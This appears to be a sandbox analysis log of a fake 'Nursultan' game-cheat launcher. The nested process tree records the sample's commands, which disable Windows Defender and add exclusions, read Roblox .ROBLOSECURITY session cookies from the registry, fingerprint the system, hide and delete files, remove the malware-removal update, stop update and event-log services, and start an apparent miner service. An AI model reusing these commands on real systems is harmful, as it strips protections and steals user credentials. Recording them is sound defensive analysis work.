        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        10⤵
        
        PID:1764
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        10⤵
        Executes dropped EXE
        
        PID:2768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        10⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        10⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1476
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        11⤵
        Views/modifies file attributes
        
        PID:448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        11⤵
        
        PID:1616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        
        PID:2964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        
        PID:2600
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        11⤵
        
        PID:1032
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        11⤵
        
        PID:1624
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:1832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        11⤵
        
        PID:2056
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:1232
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        11⤵
        
        PID:2348
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        12⤵
        Runs ping.exe
        
        PID:1544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        10⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        10⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2348
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:840
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        10⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        11⤵
        
        PID:2144
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        11⤵
        Executes dropped EXE
        
        PID:2512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        11⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        11⤵
        Executes dropped EXE
        
        PID:1576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        11⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        11⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1984
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        12⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        11⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1868
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        12⤵
        Executes dropped EXE
        
        PID:2736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        12⤵
        
        PID:1784
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        12⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1764
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        13⤵
        Views/modifies file attributes
        
        PID:1880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        13⤵
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        13⤵
        
        PID:268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        
        PID:1596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        
        PID:3044
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        13⤵
        
        PID:296
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        13⤵
        
        PID:2768
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        13⤵
        
        PID:2864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        13⤵
        
        PID:2608
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        13⤵
        Detects videocard installed
        
        PID:532
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        13⤵
        
        PID:1624
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        14⤵
        Runs ping.exe
        
        PID:344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        12⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1072
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        13⤵
        
        PID:1032
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        12⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        13⤵
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        13⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2272
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        14⤵
        Drops file in System32 directory
        
        PID:568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        14⤵
        
        PID:2304
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        15⤵
        Drops file in Windows directory
        
        PID:948
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        14⤵
        Launches sc.exe
        
        PID:2712
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        14⤵
        Launches sc.exe
        
        PID:2772
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        14⤵
        
        PID:2336
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        14⤵
        
        PID:2392
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        14⤵
        Launches sc.exe
        
        PID:680
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        14⤵
        Power Settings
        
        PID:1704
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        14⤵
        Power Settings
        
        PID:1936
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        14⤵
        Power Settings
        
        PID:1984
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        14⤵
        Power Settings
        
        PID:1140
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        14⤵
        Launches sc.exe
        
        PID:1496
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        14⤵
        Launches sc.exe
        
        PID:2244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        13⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        13⤵
        Executes dropped EXE
        
        PID:1468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        13⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1620
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        14⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        13⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1192
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        14⤵
        Executes dropped EXE
        
        PID:1772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        14⤵
        
        PID:304
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        14⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1092
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        15⤵
        Views/modifies file attributes
        
        PID:2076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        
        PID:2228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:2488
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:1932
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:1816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        
        PID:2772
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:2276
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        15⤵
        
        PID:1832
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        Runs ping.exe
        
        PID:1936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        14⤵
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        14⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3020
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        15⤵
        
        PID:1492
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        14⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        15⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        15⤵
        Executes dropped EXE
        
        PID:2572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        15⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        15⤵
        Executes dropped EXE
        
        PID:940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        15⤵
        
        PID:3048
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        15⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2804
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        16⤵
        
        PID:2964
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        16⤵
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        15⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        16⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        16⤵
        Executes dropped EXE
        
        PID:772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        16⤵
        Executes dropped EXE
        
        PID:1748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        16⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        16⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:664
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        17⤵
        
        PID:1936
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        16⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        17⤵
        
        PID:380
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        17⤵
        Executes dropped EXE
        
        PID:1868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        17⤵
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        17⤵
        Executes dropped EXE
        
        PID:1996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1700
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        17⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3052
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        18⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        17⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        18⤵
        Executes dropped EXE
        
        PID:1588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        18⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        18⤵
        Executes dropped EXE
        
        PID:1352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        18⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        18⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2620
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        19⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        18⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        19⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        19⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:1352
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        20⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:1596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        20⤵
        
        PID:2672
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        21⤵
        Drops file in Windows directory
        
        PID:2584
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        20⤵
        
        PID:2372
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        20⤵
        Launches sc.exe
        
        PID:2736
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        20⤵
        Launches sc.exe
        
        PID:2084
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        20⤵
        Launches sc.exe
        
        PID:2296
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        20⤵
        Launches sc.exe
        
        PID:1852
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        20⤵
        Power Settings
        
        PID:2220
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        20⤵
        Power Settings
        
        PID:684
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        20⤵
        Power Settings
        
